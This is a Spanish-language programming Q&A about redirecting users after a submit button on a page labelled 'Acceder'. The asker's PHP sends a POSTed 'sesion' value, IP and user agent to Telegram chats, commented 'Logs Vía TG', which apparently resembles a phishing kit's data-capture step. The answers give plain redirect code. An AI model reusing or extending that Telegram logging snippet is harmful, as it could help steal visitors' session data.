# ¿Cómo podría hacer una redirección mediante PHP cuándo presionan un botón tipo submit? (No mysql)

Tags: javascript, php, html

estoy tratando de hacer una redirección mediante php cuando los usuarios de mi web hacen click en el botón de submit pero hasta el momento no he tenido éxito.

Quiero aclarar que no es MYSQL, por lo que no es nada relacionado con bases de datos, sino que es un botón el cual envía la ip y user agent mediante telegram.

Dejo aquí mi código, gracias.

```
    /* Archivo de Configuración */
include 'config.php';
 
 
$sesion = @$_POST['sesion']; // sesion
$ip = @$_POST['ip']; // ip
$u_agent = @$_POST['u_agent']; //UA
 
 
 
 
$content = '<pre>
UID             : '.$uid.'
sesion: '.$sesion.'
ip: '.$ip.'
UA: '.$u_agent.'</pre>';
 
 
 
 
 
if ($telegram_active === 1) {
  /* Logs Vía TG */
  foreach ($chats_id as $chat_id) {
    file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=$chat_id&text=" . urlencode($content_login)."&parse_mode=HTML" );}}
 
    ?>
```

Html:

```
  <button type="submit" class="accept form_accept" id="bSendUser" name="enviar">
                                                Acceder 
   </button>
```

Comment: Englobas este botón en un formulario html, o tienes un JavaScript para hacer AJAX?

Comment: En un formulario HTML @Jakala

Answer (score 0, accepted):

Buenas tardes compañero,

Usualmente se usa JavaScript para realizar esta operación, pero también se puede usar PHP, acá te dejo una función que al hacer la llamada, se puede realizar la redirección.

Si quieres usar este código que es de PHP (o sea, se ejecuta de lado del servidor), se realice la llamada desde AJAX o similar, pero para hacer un redirect, no merece la pena, salvo que tengas que consultar información de la base de datos o similar... En cuyo caso, no incluyes este archivo php en el archivo html que estás mostrando el botón, de lo contrario, se ejecutaría en el acto.

```
function redirect($url, $statusCode = 303)
{
   header('Location: ' . $url, true, $statusCode);
   die();
}

redirect("www.google.es");
```

Para hacer una redirección desde JavaScript, necesitarás esto otro:

```
<button type="submit" class="accept form_accept" id="bSendUser" onclick="bSendUserClick()" name="enviar">Acceder</button>
```

Es importante definir el evento onclick.

Esto otro, es la parte de JS que realiza el redirect a la página que desees.

```
<script>
    function bSendUserClick() {
        window.location.href = "www.google.es";
    }
</script>
```

Espero te haya ayudado.

Un saludo y gracias!

Comment: ¡Hola! He probado a colocar ese código en la parte del PHP pero cuando accedo a mi web me redirige a Google.es, sin antes presionar el botón, ¿cómo podría solucionarlo? Gracias

Comment: Al hacer click no haces nada? O sea, no llamas a una página php o lanzas un JS? O sea, ahora mismo, al hacer click en el botón, qué hace? (sin el código que te he pasado)
Lo que te he pasado, es para que hagas la llamada, después de tus operaciones, si lo que quieres es que lo haga al hacer click, lo normal es hacerlo con JS, si es así, te paso un ejemplo, avísame :)

Comment: No te preocupes, acabo de solucionarlo, gracias por todo!